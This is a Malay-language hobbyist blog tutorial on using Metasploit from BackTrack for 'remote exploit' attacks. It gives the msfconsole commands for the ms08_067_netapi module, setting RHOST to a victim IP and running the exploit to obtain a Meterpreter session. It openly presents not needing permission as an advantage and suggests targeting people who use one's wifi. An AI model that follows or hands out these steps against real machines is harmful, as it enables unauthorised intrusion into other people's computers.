Tutorial Metasploit Menggunakan Backtrack (Remote Exploit)

Assalamualaikum semua,

th3bAdh pernah membaca artikel tentang metasploit di OMG! Hacker yang dikarang oleh Abg Saki, dan macam ada sesuatu yang tertinggal pada artikel tersebut, Jadi tutorial pada kali akan menyambung sedikit tentang Metasploit, bagi yang belum baca sila dapatkan kan kefahaman terlebih dahulu atau boleh rujuk disini,(karangan Abg Saki)



Seperti yang anda tahu, Metasploit adalah salah satu tool yang sangat popular pada semua peringkat tidak kira lah dari tahap Professional sehingga ke tahap Script Kiddie kerana ianya menggunakan baris perintah yang mudah dan menjimat kan masa bagi penguji keselamatan.

Jadi apakah yang dimaksudkkan Remote Exploit yerk?

Remote Exploit dari pemahaman aku, bermaksud mengawal atau menghantar exploit secara jauh  (kalau salah betulkan..hehehe)

Kelebihan nya
 

1. Tidak perlu mendapatkan akses/kebenaran untuk menggunakan komputer itu (bermakna kita boleh target sapa-sapa je terutama orang yang menggunakan wifi kita...heheh

2.Boleh hack komputer luar dari LAN kita (aku tak pernah berjaya lagi hehehe..)

Kekurangan nya
 

1. Tidak semua komputer boleh dihack (bergantung kepada vuln yang terdapat di dalam komputer tersebut, antara yang paling sukar tembus Windows 7, tapi tak semestinya tak boleh tembus)


2. Firewall sekarang menyebabkan sukar untuk tembus,

3. Perisian anti virus menyekat dan melaporkan ianya sebagai Trojan

Jadi anda sudah faham sedikit apa yang dimaksudkan dengan Remote Exploit. Sekiranya masih lagi tidak faham, th3bAdh berasakan anda tidak lagi boleh meneruskan dengan bacaaan seterusya, kasi faham dahulu yerk.

Bagi remote exploit ini, ianya sedikit rumit bagi permulaan, kerana tidak semua komputer mempunyai vurln/zero day , jadi bagi tujuaan pembelajaran, th3bAdh syorkan anda bermula dengan menguji Windows XP SP1 atau Windows Server 2003 kerana ianya ianya terdapat perlbagai bug. th3bAdh tidak galakkan untuk menguji dengan Windows 7 kerana sistem keselamatan yang baik menyebabkan ianya sukar digodam.

Macam mana nak mula

buka terminal dan taip  


msfconsole

tunggu sehingga ia selesai load 





kemudian, taipkan

use windows/smb/ms08_067_netapi

taip

set RHOST 192.168.1.13

penerangan -
RHOST - adalah target IP mangsa

kemudian
 

exploit

sekiranya ianya seperti dibawah, bermakna anda telah berjaya.
 
Meterpreter session 1 started ....Binggo!

Jadi, itu adalah serba sedikit tentang Remote Exploit, sekiranya anda tidak berjaya, pastikan anda memulakan pengujian pada Windows XP SP1 terlebih dahulu. Nantikan tutorial backtrack akan datang.
Powered by Blogger.